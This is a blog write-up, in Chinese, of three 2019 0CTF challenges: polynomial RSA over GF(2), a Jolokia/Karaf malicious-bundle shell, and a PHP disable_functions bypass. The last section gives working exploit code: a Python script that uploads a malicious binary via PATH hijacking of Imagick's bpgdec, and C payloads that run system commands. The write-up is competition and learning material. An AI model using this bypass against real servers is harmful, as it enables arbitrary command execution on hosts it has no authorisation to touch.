

Xi4or0uji's blog

2019 0ctf wp

Xi4or0uji's blog

2019 0ctf wp

CTF

字数统计: 4.7k阅读时长: 28 min

 2019/03/25   Share

• 
• 
• 
• 
• 

babyrsa

首先pubkey.py可以看到n的值

from sage.all import GF, PolynomialRing
P=PolynomialRing(GF(2),'x')
e = 31337
n = P('x^2048 + x^2046 + x^2043 + x^2040 + x^2036 + x^2035 + x^2034 + x^2033 + x^2031 + x^2029 + x^2025 + x^2024 + x^2022 + x^2019 + x^2018 + x^2017 + x^2012 + x^2007 + x^2006 + x^2004 + x^2000 + x^1999 + x^1998 + x^1997 + x^1993 + x^1992 + x^1991 + x^1986 + x^1982 + x^1981 + x^1979 + x^1978 + x^1977 + x^1975 + x^1970 + x^1964 + x^1963 + x^1962 + x^1961 + x^1960 + x^1959 + x^1958 + x^1955 + x^1954 + x^1952 + x^1951 + x^1949 + x^1947 + x^1942 + x^1939 + x^1938 + x^1936 + x^1934 + x^1933 + x^1932 + x^1930 + x^1928 + x^1927 + x^1923 + x^1922 + x^1919 + x^1918 + x^1915 + x^1914 + x^1913 + x^1912 + x^1911 + x^1910 + x^1908 + x^1903 + x^1902 + x^1900 + x^1899 + x^1897 + x^1893 + x^1891 + x^1890 + x^1886 + x^1881 + x^1880 + x^1879 + x^1878 + x^1875 + x^1874 + x^1873 + x^1872 + x^1871 + x^1870 + x^1869 + x^1865 + x^1863 + x^1862 + x^1860 + x^1856 + x^1855 + x^1853 + x^1852 + x^1845 + x^1841 + x^1839 + x^1837 + x^1836 + x^1835 + x^1833 + x^1832 + x^1829 + x^1828 + x^1827 + x^1826 + x^1824 + x^1823 + x^1822 + x^1821 + x^1820 + x^1819 + x^1818 + x^1817 + x^1813 + x^1812 + x^1810 + x^1809 + x^1808 + x^1807 + x^1803 + x^1799 + x^1797 + x^1796 + x^1794 + x^1792 + x^1790 + x^1786 + x^1783 + x^1782 + x^1779 + x^1778 + x^1776 + x^1775 + x^1774 + x^1772 + x^1767 + x^1766 + x^1765 + x^1764 + x^1763 + x^1762 + x^1759 + x^1757 + x^1756 + x^1754 + x^1753 + x^1752 + x^1750 + x^1749 + x^1741 + x^1734 + x^1730 + x^1729 + x^1726 + x^1725 + x^1723 + x^1722 + x^1721 + x^1716 + x^1714 + x^1713 + x^1712 + x^1710 + x^1709 + x^1706 + x^1705 + x^1703 + x^1702 + x^1700 + x^1698 + x^1693 + x^1692 + x^1691 + x^1690 + x^1683 + x^1682 + x^1681 + x^1680 + x^1679 + x^1677 + x^1672 + x^1670 + x^1669 + x^1666 + x^1663 + x^1662 + x^1661 + x^1659 + x^1655 + x^1653 + x^1651 + x^1649 + x^1648 + x^1647 + x^1646 + x^1644 + x^1643 + x^1642 + x^1640 + x^1639 + x^1638 + x^1634 + x^1633 + x^1628 + x^1620 + x^1619 + x^1618 + x^1616 + x^1614 + x^1611 + x^1610 + x^1608 + x^1605 + x^1604 + x^1603 + x^1599 + x^1597 + x^1595 + x^1594 + x^1590 + x^1588 + x^1587 + x^1585 + x^1583 + x^1580 + x^1579 + x^1577 + x^1574 + x^1573 + x^1572 + x^1568 + x^1566 + x^1565 + x^1563 + x^1562 + x^1560 + x^1555 + x^1554 + x^1552 + x^1550 + x^1549 + x^1548 + x^1545 + x^1544 + x^1542 + x^1540 + x^1538 + x^1537 + x^1536 + x^1535 + x^1534 + x^1533 + x^1532 + x^1531 + x^1528 + x^1526 + x^1525 + x^1523 + x^1522 + x^1521 + x^1519 + x^1517 + x^1515 + x^1510 + x^1509 + x^1506 + x^1504 + x^1502 + x^1499 + x^1498 + x^1497 + x^1488 + x^1483 + x^1480 + x^1477 + x^1472 + x^1471 + x^1469 + x^1468 + x^1467 + x^1466 + x^1464 + x^1462 + x^1457 + x^1456 + x^1455 + x^1454 + x^1453 + x^1452 + x^1448 + x^1446 + x^1444 + x^1443 + x^1442 + x^1441 + x^1440 + x^1436 + x^1435 + x^1431 + x^1428 + x^1425 + x^1424 + x^1422 + x^1420 + x^1415 + x^1414 + x^1411 + x^1410 + x^1408 + x^1406 + x^1405 + x^1403 + x^1402 + x^1399 + x^1397 + x^1396 + x^1395 + x^1394 + x^1393 + x^1391 + x^1388 + x^1385 + x^1377 + x^1376 + x^1372 + x^1371 + x^1370 + x^1369 + x^1367 + x^1363 + x^1361 + x^1357 + x^1355 + x^1354 + x^1349 + x^1343 + x^1339 + x^1338 + x^1337 + x^1336 + x^1335 + x^1332 + x^1329 + x^1327 + x^1326 + x^1324 + x^1321 + x^1315 + x^1314 + x^1312 + x^1310 + x^1309 + x^1305 + x^1304 + x^1303 + x^1302 + x^1299 + x^1298 + x^1296 + x^1295 + x^1293 + x^1291 + x^1290 + x^1289 + x^1284 + x^1283 + x^1282 + x^1281 + x^1280 + x^1278 + x^1277 + x^1276 + x^1275 + x^1272 + x^1270 + x^1269 + x^1268 + x^1267 + x^1259 + x^1257 + x^1254 + x^1252 + x^1251 + x^1249 + x^1247 + x^1246 + x^1244 + x^1240 + x^1238 + x^1233 + x^1232 + x^1229 + x^1222 + x^1219 + x^1217 + x^1211 + x^1209 + x^1208 + x^1205 + x^1204 + x^1203 + x^1202 + x^1200 + x^1197 + x^1196 + x^1195 + x^1193 + x^1192 + x^1189 + x^1187 + x^1186 + x^1185 + x^1184 + x^1183 + x^1182 + x^1181 + x^1177 + x^1176 + x^1173 + x^1170 + x^1167 + x^1166 + x^1162 + x^1161 + x^1160 + x^1159 + x^1158 + x^1156 + x^1155 + x^1154 + x^1153 + x^1151 + x^1146 + x^1143 + x^1141 + x^1139 + x^1138 + x^1137 + x^1135 + x^1131 + x^1129 + x^1128 + x^1125 + x^1124 + x^1122 + x^1116 + x^1115 + x^1114 + x^1112 + x^1111 + x^1107 + x^1106 + x^1105 + x^1104 + x^1103 + x^1102 + x^1098 + x^1097 + x^1095 + x^1094 + x^1092 + x^1088 + x^1087 + x^1085 + x^1077 + x^1076 + x^1075 + x^1072 + x^1069 + x^1068 + x^1061 + x^1060 + x^1059 + x^1057 + x^1055 + x^1054 + x^1053 + x^1050 + x^1047 + x^1046 + x^1044 + x^1043 + x^1042 + x^1036 + x^1029 + x^1025 + x^1024 + x^1023 + x^1022 + x^1019 + x^1016 + x^1013 + x^1012 + x^1010 + x^1008 + x^1007 + x^1006 + x^1004 + x^1000 + x^996 + x^995 + x^993 + x^992 + x^989 + x^985 + x^983 + x^978 + x^977 + x^975 + x^972 + x^971 + x^970 + x^969 + x^967 + x^963 + x^957 + x^956 + x^952 + x^950 + x^948 + x^945 + x^942 + x^941 + x^940 + x^938 + x^937 + x^936 + x^935 + x^932 + x^931 + x^930 + x^928 + x^927 + x^926 + x^923 + x^921 + x^918 + x^916 + x^914 + x^913 + x^909 + x^906 + x^905 + x^904 + x^902 + x^897 + x^895 + x^892 + x^889 + x^888 + x^887 + x^886 + x^885 + x^884 + x^882 + x^881 + x^879 + x^876 + x^870 + x^868 + x^867 + x^865 + x^862 + x^861 + x^859 + x^858 + x^856 + x^854 + x^848 + x^847 + x^846 + x^843 + x^839 + x^837 + x^836 + x^832 + x^831 + x^830 + x^829 + x^826 + x^823 + x^821 + x^820 + x^817 + x^815 + x^812 + x^809 + x^808 + x^805 + x^803 + x^802 + x^800 + x^799 + x^797 + x^795 + x^793 + x^792 + x^788 + x^786 + x^784 + x^780 + x^775 + x^774 + x^770 + x^768 + x^766 + x^764 + x^761 + x^760 + x^753 + x^752 + x^751 + x^750 + x^747 + x^744 + x^742 + x^741 + x^737 + x^734 + x^732 + x^728 + x^727 + x^724 + x^722 + x^721 + x^719 + x^717 + x^715 + x^714 + x^713 + x^710 + x^709 + x^705 + x^703 + x^701 + x^698 + x^697 + x^695 + x^690 + x^687 + x^685 + x^684 + x^682 + x^681 + x^680 + x^677 + x^676 + x^674 + x^673 + x^672 + x^671 + x^670 + x^669 + x^665 + x^663 + x^659 + x^652 + x^651 + x^650 + x^649 + x^648 + x^647 + x^646 + x^645 + x^642 + x^640 + x^638 + x^632 + x^631 + x^630 + x^629 + x^627 + x^626 + x^623 + x^622 + x^621 + x^620 + x^616 + x^615 + x^610 + x^605 + x^602 + x^601 + x^600 + x^599 + x^598 + x^596 + x^594 + x^593 + x^591 + x^583 + x^581 + x^579 + x^578 + x^577 + x^576 + x^575 + x^573 + x^572 + x^571 + x^570 + x^569 + x^565 + x^563 + x^562 + x^561 + x^559 + x^557 + x^555 + x^552 + x^551 + x^546 + x^544 + x^542 + x^541 + x^540 + x^539 + x^538 + x^537 + x^535 + x^533 + x^530 + x^527 + x^523 + x^522 + x^520 + x^519 + x^515 + x^513 + x^511 + x^509 + x^507 + x^505 + x^504 + x^503 + x^499 + x^497 + x^496 + x^495 + x^493 + x^492 + x^488 + x^486 + x^481 + x^480 + x^479 + x^478 + x^477 + x^472 + x^470 + x^468 + x^467 + x^464 + x^463 + x^460 + x^459 + x^455 + x^454 + x^453 + x^446 + x^445 + x^444 + x^443 + x^440 + x^438 + x^437 + x^432 + x^431 + x^428 + x^427 + x^426 + x^420 + x^419 + x^416 + x^415 + x^414 + x^413 + x^412 + x^411 + x^405 + x^404 + x^401 + x^396 + x^393 + x^392 + x^391 + x^388 + x^387 + x^383 + x^381 + x^380 + x^377 + x^376 + x^369 + x^364 + x^362 + x^358 + x^357 + x^356 + x^355 + x^353 + x^351 + x^349 + x^340 + x^339 + x^338 + x^337 + x^336 + x^335 + x^334 + x^332 + x^330 + x^328 + x^327 + x^326 + x^324 + x^320 + x^318 + x^316 + x^315 + x^309 + x^302 + x^298 + x^292 + x^291 + x^290 + x^289 + x^287 + x^286 + x^285 + x^284 + x^281 + x^279 + x^278 + x^276 + x^274 + x^273 + x^272 + x^271 + x^267 + x^266 + x^264 + x^263 + x^262 + x^260 + x^259 + x^256 + x^254 + x^253 + x^252 + x^251 + x^249 + x^248 + x^247 + x^245 + x^244 + x^241 + x^239 + x^235 + x^234 + x^233 + x^232 + x^231 + x^230 + x^226 + x^224 + x^221 + x^219 + x^218 + x^216 + x^215 + x^214 + x^209 + x^207 + x^206 + x^202 + x^201 + x^198 + x^197 + x^194 + x^193 + x^192 + x^191 + x^189 + x^188 + x^183 + x^182 + x^181 + x^180 + x^179 + x^178 + x^177 + x^175 + x^172 + x^169 + x^168 + x^166 + x^165 + x^164 + x^163 + x^158 + x^157 + x^153 + x^152 + x^149 + x^147 + x^146 + x^144 + x^140 + x^139 + x^136 + x^128 + x^127 + x^126 + x^124 + x^123 + x^122 + x^121 + x^116 + x^115 + x^113 + x^112 + x^109 + x^108 + x^107 + x^106 + x^104 + x^103 + x^102 + x^101 + x^100 + x^99 + x^97 + x^95 + x^94 + x^93 + x^92 + x^87 + x^84 + x^83 + x^82 + x^80 + x^79 + x^78 + x^76 + x^73 + x^70 + x^69 + x^68 + x^67 + x^66 + x^65 + x^63 + x^60 + x^59 + x^57 + x^55 + x^52 + x^51 + x^47 + x^46 + x^45 + x^43 + x^42 + x^40 + x^36 + x^35 + x^30 + x^29 + x^28 + x^27 + x^23 + x^20 + x^17 + x^14 + x^9 + x^7 + x^3 + 1')

然后factor一下，出来两个多项式，一个是p一个是q

p=(x^821 + x^820 + x^819 + x^818 + x^817 + x^814 + x^813 + x^812 + x^810 + x^808 + x^807 + x^804 + x^801 + x^796 + x^795 + x^794 + x^790 + x^787 + x^786 + x^784 + x^781 + x^780 + x^779 + x^778 + x^777 + x^776 + x^775 + x^774 + x^773 + x^771 + x^770 + x^768 + x^766 + x^762 + x^761 + x^760 + x^758 + x^757 + x^752 + x^749 + x^748 + x^747 + x^740 + x^737 + x^736 + x^732 + x^727 + x^723 + x^722 + x^719 + x^718 + x^717 + x^716 + x^715 + x^714 + x^711 + x^710 + x^708 + x^704 + x^703 + x^702 + x^701 + x^700 + x^699 + x^698 + x^696 + x^692 + x^690 + x^689 + x^687 + x^685 + x^683 + x^681 + x^676 + x^674 + x^672 + x^671 + x^670 + x^668 + x^667 + x^665 + x^664 + x^663 + x^661 + x^660 + x^659 + x^657 + x^656 + x^655 + x^651 + x^649 + x^646 + x^644 + x^637 + x^636 + x^634 + x^633 + x^632 + x^631 + x^628 + x^626 + x^625 + x^622 + x^621 + x^620 + x^614 + x^611 + x^609 + x^608 + x^605 + x^604 + x^599 + x^597 + x^592 + x^591 + x^589 + x^580 + x^578 + x^574 + x^572 + x^569 + x^566 + x^565 + x^563 + x^562 + x^560 + x^552 + x^550 + x^545 + x^544 + x^543 + x^542 + x^540 + x^538 + x^537 + x^534 + x^533 + x^528 + x^527 + x^526 + x^523 + x^522 + x^519 + x^518 + x^515 + x^514 + x^512 + x^505 + x^503 + x^502 + x^500 + x^498 + x^496 + x^493 + x^492 + x^491 + x^490 + x^489 + x^487 + x^482 + x^480 + x^479 + x^478 + x^476 + x^474 + x^472 + x^471 + x^470 + x^469 + x^468 + x^466 + x^462 + x^459 + x^458 + x^457 + x^456 + x^454 + x^453 + x^451 + x^449 + x^447 + x^445 + x^443 + x^442 + x^441 + x^440 + x^437 + x^434 + x^428 + x^425 + x^424 + x^423 + x^420 + x^415 + x^412 + x^411 + x^410 + x^408 + x^405 + x^404 + x^403 + x^401 + x^400 + x^394 + x^391 + x^390 + x^389 + x^388 + x^384 + x^383 + x^382 + x^379 + x^378 + x^376 + x^375 + x^372 + x^371 + x^370 + x^368 + x^366 + x^365 + x^364 + x^361 + x^358 + x^357 + x^356 + x^354 + x^351 + x^347 + x^345 + x^344 + x^340 + x^339 + x^335 + x^334 + x^333 + x^332 + x^331 + x^328 + x^326 + x^322 + x^318 + x^315 + x^312 + x^306 + x^303 + x^302 + x^301 + x^300 + x^299 + x^298 + x^297 + x^295 + x^293 + x^291 + x^289 + x^288 + x^287 + x^286 + x^285 + x^282 + x^280 + x^279 + x^277 + x^274 + x^273 + x^270 + x^269 + x^268 + x^263 + x^262 + x^261 + x^259 + x^258 + x^257 + x^256 + x^252 + x^250 + x^249 + x^245 + x^244 + x^243 + x^242 + x^236 + x^234 + x^233 + x^232 + x^228 + x^225 + x^223 + x^222 + x^221 + x^219 + x^218 + x^215 + x^214 + x^213 + x^211 + x^210 + x^209 + x^207 + x^205 + x^203 + x^202 + x^200 + x^198 + x^197 + x^193 + x^191 + x^190 + x^185 + x^184 + x^182 + x^180 + x^179 + x^177 + x^172 + x^168 + x^167 + x^165 + x^163 + x^161 + x^159 + x^157 + x^156 + x^155 + x^154 + x^153 + x^151 + x^150 + x^149 + x^148 + x^146 + x^145 + x^143 + x^139 + x^137 + x^136 + x^135 + x^133 + x^132 + x^130 + x^127 + x^126 + x^125 + x^124 + x^122 + x^121 + x^120 + x^119 + x^117 + x^116 + x^113 + x^111 + x^110 + x^109 + x^108 + x^107 + x^106 + x^105 + x^100 + x^97 + x^95 + x^89 + x^88 + x^87 + x^86 + x^85 + x^84 + x^82 + x^81 + x^80 + x^77 + x^76 + x^75 + x^74 + x^69 + x^67 + x^65 + x^61 + x^59 + x^57 + x^53 + x^52 + x^50 + x^49 + x^48 + x^45 + x^41 + x^40 + x^36 + x^34 + x^33 + x^27 + x^26 + x^24 + x^23 + x^22 + x^21 + x^20 + x^19 + x^18 + x^15 + x^14 + x^12 + x^9 + x^6 + x^4 + x^3 + x + 1)
q=(x^1227 + x^1226 + x^1225 + x^1224 + x^1219 + x^1214 + x^1213 + x^1211 + x^1210 + x^1208 + x^1205 + x^1203 + x^1202 + x^1201 + x^1198 + x^1197 + x^1194 + x^1193 + x^1188 + x^1185 + x^1184 + x^1183 + x^1180 + x^1178 + x^1177 + x^1175 + x^1173 + x^1171 + x^1170 + x^1169 + x^1168 + x^1166 + x^1164 + x^1163 + x^1162 + x^1160 + x^1157 + x^1155 + x^1151 + x^1149 + x^1144 + x^1143 + x^1142 + x^1141 + x^1140 + x^1139 + x^1137 + x^1136 + x^1135 + x^1134 + x^1130 + x^1126 + x^1122 + x^1121 + x^1120 + x^1118 + x^1117 + x^1115 + x^1114 + x^1111 + x^1110 + x^1108 + x^1107 + x^1105 + x^1104 + x^1103 + x^1102 + x^1101 + x^1099 + x^1094 + x^1092 + x^1090 + x^1089 + x^1085 + x^1082 + x^1079 + x^1075 + x^1074 + x^1073 + x^1070 + x^1068 + x^1067 + x^1066 + x^1065 + x^1064 + x^1061 + x^1060 + x^1059 + x^1058 + x^1055 + x^1054 + x^1053 + x^1051 + x^1047 + x^1046 + x^1043 + x^1042 + x^1041 + x^1039 + x^1037 + x^1035 + x^1034 + x^1033 + x^1031 + x^1029 + x^1028 + x^1027 + x^1026 + x^1025 + x^1023 + x^1021 + x^1019 + x^1018 + x^1016 + x^1014 + x^1012 + x^1009 + x^1006 + x^1004 + x^1002 + x^1000 + x^999 + x^996 + x^994 + x^993 + x^992 + x^991 + x^990 + x^989 + x^988 + x^984 + x^981 + x^980 + x^978 + x^977 + x^976 + x^974 + x^972 + x^967 + x^965 + x^964 + x^963 + x^962 + x^958 + x^957 + x^955 + x^953 + x^952 + x^951 + x^950 + x^949 + x^948 + x^947 + x^945 + x^944 + x^939 + x^936 + x^935 + x^934 + x^931 + x^930 + x^926 + x^924 + x^923 + x^920 + x^917 + x^913 + x^912 + x^910 + x^909 + x^908 + x^907 + x^906 + x^905 + x^903 + x^902 + x^901 + x^899 + x^896 + x^893 + x^892 + x^891 + x^887 + x^886 + x^885 + x^884 + x^883 + x^880 + x^877 + x^876 + x^872 + x^868 + x^867 + x^864 + x^863 + x^862 + x^861 + x^858 + x^856 + x^855 + x^854 + x^851 + x^847 + x^846 + x^844 + x^843 + x^842 + x^841 + x^840 + x^838 + x^836 + x^835 + x^833 + x^832 + x^830 + x^829 + x^828 + x^826 + x^825 + x^822 + x^821 + x^817 + x^815 + x^812 + x^811 + x^810 + x^808 + x^806 + x^804 + x^803 + x^802 + x^801 + x^800 + x^797 + x^792 + x^790 + x^789 + x^788 + x^787 + x^785 + x^784 + x^783 + x^781 + x^780 + x^778 + x^777 + x^776 + x^774 + x^771 + x^770 + x^769 + x^766 + x^764 + x^762 + x^759 + x^755 + x^751 + x^749 + x^748 + x^747 + x^746 + x^742 + x^737 + x^734 + x^733 + x^729 + x^727 + x^725 + x^724 + x^723 + x^722 + x^720 + x^718 + x^715 + x^713 + x^711 + x^709 + x^707 + x^706 + x^702 + x^699 + x^698 + x^695 + x^692 + x^687 + x^680 + x^679 + x^678 + x^677 + x^676 + x^674 + x^670 + x^669 + x^668 + x^662 + x^656 + x^654 + x^653 + x^652 + x^651 + x^648 + x^646 + x^645 + x^644 + x^642 + x^640 + x^639 + x^638 + x^637 + x^634 + x^633 + x^632 + x^629 + x^628 + x^627 + x^626 + x^625 + x^623 + x^619 + x^617 + x^613 + x^612 + x^611 + x^610 + x^605 + x^604 + x^603 + x^601 + x^597 + x^595 + x^593 + x^591 + x^590 + x^589 + x^588 + x^587 + x^585 + x^583 + x^581 + x^580 + x^577 + x^576 + x^574 + x^573 + x^572 + x^570 + x^569 + x^563 + x^557 + x^555 + x^553 + x^551 + x^548 + x^546 + x^545 + x^541 + x^538 + x^535 + x^534 + x^529 + x^528 + x^527 + x^526 + x^525 + x^524 + x^523 + x^522 + x^521 + x^520 + x^519 + x^518 + x^517 + x^516 + x^515 + x^512 + x^510 + x^509 + x^507 + x^506 + x^503 + x^499 + x^498 + x^497 + x^496 + x^495 + x^493 + x^492 + x^491 + x^487 + x^483 + x^479 + x^477 + x^475 + x^473 + x^467 + x^466 + x^465 + x^464 + x^462 + x^456 + x^455 + x^454 + x^452 + x^445 + x^444 + x^442 + x^438 + x^437 + x^436 + x^435 + x^434 + x^432 + x^431 + x^430 + x^429 + x^427 + x^426 + x^425 + x^424 + x^421 + x^420 + x^419 + x^418 + x^415 + x^412 + x^409 + x^404 + x^399 + x^398 + x^397 + x^396 + x^391 + x^390 + x^389 + x^387 + x^386 + x^385 + x^384 + x^383 + x^382 + x^379 + x^377 + x^376 + x^370 + x^368 + x^366 + x^363 + x^361 + x^356 + x^355 + x^353 + x^350 + x^349 + x^345 + x^343 + x^342 + x^340 + x^339 + x^332 + x^331 + x^329 + x^328 + x^327 + x^324 + x^321 + x^320 + x^315 + x^312 + x^309 + x^308 + x^307 + x^306 + x^305 + x^304 + x^300 + x^299 + x^297 + x^296 + x^295 + x^294 + x^293 + x^292 + x^290 + x^285 + x^284 + x^278 + x^277 + x^276 + x^275 + x^273 + x^272 + x^270 + x^269 + x^268 + x^267 + x^266 + x^265 + x^262 + x^261 + x^260 + x^258 + x^257 + x^256 + x^254 + x^251 + x^250 + x^248 + x^247 + x^245 + x^244 + x^240 + x^237 + x^235 + x^234 + x^233 + x^232 + x^231 + x^229 + x^225 + x^222 + x^220 + x^219 + x^217 + x^216 + x^214 + x^213 + x^210 + x^209 + x^207 + x^203 + x^202 + x^199 + x^196 + x^192 + x^191 + x^188 + x^187 + x^185 + x^184 + x^183 + x^182 + x^174 + x^173 + x^170 + x^169 + x^168 + x^167 + x^166 + x^162 + x^158 + x^157 + x^156 + x^152 + x^150 + x^148 + x^147 + x^146 + x^144 + x^142 + x^141 + x^140 + x^138 + x^137 + x^134 + x^129 + x^128 + x^125 + x^124 + x^123 + x^122 + x^121 + x^120 + x^115 + x^113 + x^112 + x^111 + x^109 + x^108 + x^106 + x^104 + x^101 + x^100 + x^98 + x^96 + x^95 + x^94 + x^92 + x^91 + x^89 + x^87 + x^86 + x^85 + x^84 + x^77 + x^75 + x^73 + x^70 + x^68 + x^67 + x^66 + x^60 + x^57 + x^53 + x^51 + x^50 + x^49 + x^46 + x^44 + x^43 + x^42 + x^41 + x^39 + x^36 + x^35 + x^32 + x^30 + x^28 + x^27 + x^25 + x^24 + x^23 + x^20 + x^18 + x^17 + x^10 + x^9 + x^8 + x^5 + x^4 + x^3 + x^2 + x + 1)

然后就是看论文找到伽罗瓦域的欧拉函数

因此我们可以知道

phi(n)=pm*(1-1/p1)*(1-1/p2)
      =pm*(1-1/p)*(1-1/q)
      =2^2048(1-1/2^821)*(1-1/2^1227)
      =(2^821-1)*(2^1227-1)

所以此时e知道，phi知道，就只剩求d了

图中的x就是d，接下来就是求明文了
将flag.enc的文件读出来是这段

23931938409134006846469410550487073743925192650755116938225541794524723083910240603620279453298714584321800170326063144616472531553643627071552202613402950579120189960424183462876292590831564884347025119938858471788053191321980663696621632084753893732784657023312407591768406322125753947265987815937165961039424015628319982913336402297718720925447102042668906173729998301139577468193468132305331072754842771657432484688590927575895743853584931297836925498250475231655832566787366689988158399203844420168837827423836936015638932385609040452870954522482255864355639427304567768665723098741671323173831781775755570779256

然后跟着sage的加密过程解密就行


最后

m = 12929751515717784223190125071095033840972126618103851506531524795815629301057549901578587618937134822682802098496427474753288112009126414456232355335989529959849075718110296567230826019289845128370864725824070831511344761744559911657462484008064553761322934104763420141593597788688628235476191502377597826935393982157025297683756512358373217719860916477793044899633710148649825902391311211888551231643872435408487897310375126980062534462671993291565349596885502486769512045272366253808741340159426524945255488751645903929814963731986204149626310974886059236306335075272063744650146690027530594609392956631736380597881L
print hex(m)[2:]
s = '666c61677b5031656135655f6b3333705f4e5f61735f415f696e54656765527e7e7e7e7e7e7d6a49c6b2a08d0af76b'
print s.decode('hex')

Ghost pepper

这题一开始是脑洞，题目ghost pepper=鬼辣椒=jolokia，先按提示karaf/karaf登录进去，接着就一直404了……..
访问一下jolokia/list寻找可以利用的mbean


接下来我们制作一个恶意的bundle，具体过程看这里https://blog.csdn.net/Love_Taylor/article/details/75194394

将run以后生成的jar包放去vps上，然后向服务器post json数据，install恶意的bundle包

拿到id然后start

监听getshell

Wallbreaker Easy

题目地址：http://111.186.63.208:31340/
进去看到一个后门，但是连过去报500，同时也不能执行系统函数，然后肉鸡就卡住了，到了最后twings大师傅带了肉鸡一把，终于做出来了
考察点是这个，imagemagick的漏洞 https://www.freebuf.com/articles/web/192052.html
原理就是在web应用启动新进程a的时候，a进程内部调用了一个系统函数b，b函数又在系统共享对象c.so里面，所以系统会加载c.so，但是如果我们在加载c.so之前先加载c_evil.so，而且c_evil.so里面恰好也有名字为b的函数，同时c_evil.so优先级比较高，因此系统会调用c_evil.so的b函数而不是c.so的b函数，因此只要c_evil.so可控，我们就可以绕过disable_functions执行任意命令了
先本地尝试一波
追踪一下可以看到imagick调用的系统函数

rouji1.php

<?php
$image = new Imagick('Sun.bpg');
?>

接下来我们就要伪造这样的函数了
poc.c

#include <unistd.h>
#include <sys/types.h>
int main(void){
        system("/bin/ls -al / > /tmp/pwn");
        return 0;
}

rouji2.php

<?php
putenv("PATH=/tmp");
$image = new Imagick('Sun.bpg');
?>

可以看到确实可以成功利用执行任意命令，接下来就打题目了
exp如下

# -*- coding:utf8 -*-
import base64
import requests

url = "http://111.186.63.208:31340/"
evil = open("poc1", "rb").read()
evil = base64.b64encode(evil)
php = "putenv('PATH=/tmp/1f666575cbdf2d529c7a01658617cbb9');" \
	"file_put_contents('/tmp/1f666575cbdf2d529c7a01658617cbb9/bpgdec', base64_decode('" + evil + "'));"\
	"chmod('/tmp/1f666575cbdf2d529c7a01658617cbb9/bpgdec', 0777);"\
	"$image = new Imagick('Sun.bpg');"\
	"echo file_get_contents('/tmp/1f666575cbdf2d529c7a01658617cbb9/pwn');"  
data = {
    "backdoor": php
}
print requests.post(url=url, data=data).content

poc.c

#include <unistd.h>
#include <sys/types.h>
int main(void)
{
    system("/readflag > /tmp/1f666575cbdf2d529c7a01658617cbb9/pwn");
    return 0;
}

• Next Post
  code breaking lumenserial
• Previous Post
  code breaking thejs

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. babyrsa
2. 2. Ghost pepper
3. 3. Wallbreaker Easy



• Archive
• Tag
• Cate

Total : 68

2020

• 02/052020 HGAME

2019

• 11/122019红帽杯wp
• 11/102019湖湘杯wp
• 11/07利用分块传输绕过WAF进行SQL注入
• 11/012019上海市大学生信息安全竞赛wp
• 10/30HTTP请求走私
• 10/25内网端口转发
• 10/18反馈移位寄存器
• 10/16Shiro RememberMe 1.2.4远程代码执行漏洞复现
• 09/112019 bytectf wp
• 08/252019 SUCTF wp
• 08/072019 De1CTF wp
• 08/05laravel框架学习
• 07/282019全国大学生信息安全竞赛决赛wp
• 07/22CyBRICS CTF Quals 2019 wp
• 07/11php-fpm
• 07/10文件上传汇总
• 06/27php反序列化由浅到深
• 06/25SQL注入汇总
• 05/272019强网杯wp
• 05/212019 RCTF wp
• 05/192019 defcon ctf 学习
• 05/15open_basedir bypass
• 05/08sixstarCTF web 学习
• 05/07反射
• 04/25CONFidence CTF的一道题
• 04/222019 全国大学生信息安全竞赛 writeup
• 04/192019 DDCTF web writeup
• 04/11rips 2017
• 04/112019西湖论剑web writeup
• 03/252019 0ctf wp
• 03/25code breaking thejs
• 03/25code breaking lumenserial
• 03/20code breaking easy
• 03/172019GWHT考核题wp
• 03/15利用mysql local infile读取客户端文件
• 03/112019 hgame week4
• 03/062019 hgame week3
• 03/012019安恒杯二月赛
• 03/01imap_open()实现远程任意代码执行（CVE-2018-19518）
• 02/27MongoDB注入
• 02/262018 Tokyo Westerns CTF
• 02/242019tamuctf
• 02/242018百越杯wp
• 02/21python格式化字符串
• 02/19用docker搭个ctf题目
• 02/12RSA初探
• 02/072019安恒杯一月赛
• 02/032019 hgame week2
• 01/312018SWPUCTF
• 01/292019 hgame week1
• 01/20n1ctf writeup
• 01/18javascript原型链污染
• 01/16lctf babyphp's revenge
• 01/15flask之ssti模板注入

2018

• 11/29xxe漏洞攻击与防御
• 11/182018高校运维赛wp
• 11/15suctf招新赛wp
• 11/14很简单的xss
• 11/14你拿不到我的源码
• 11/12HCTF2018 writeup
• 11/062018上海市大学生信息安全竞赛web题解
• 10/31百度杯 ctf 九月场
• 10/29xss challenge 刷题记录
• 10/27hacklu 2018 Baby PHP
• 10/25hitcon 2018 One Line PHP Challenge
• 10/23一个php的小trick：file_put_contents
• 10/19没有字母数字获得webshell

CTF 安恒杯 MongoDB Code Breaking java php_tricks cve javascript python xss web+re SQL 端口转发 upload docker Code_Breaking HTTP laravel mysql xxe LFSR RSA serialize php-fpm



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

CTF WEB CVE docker CRYPTO

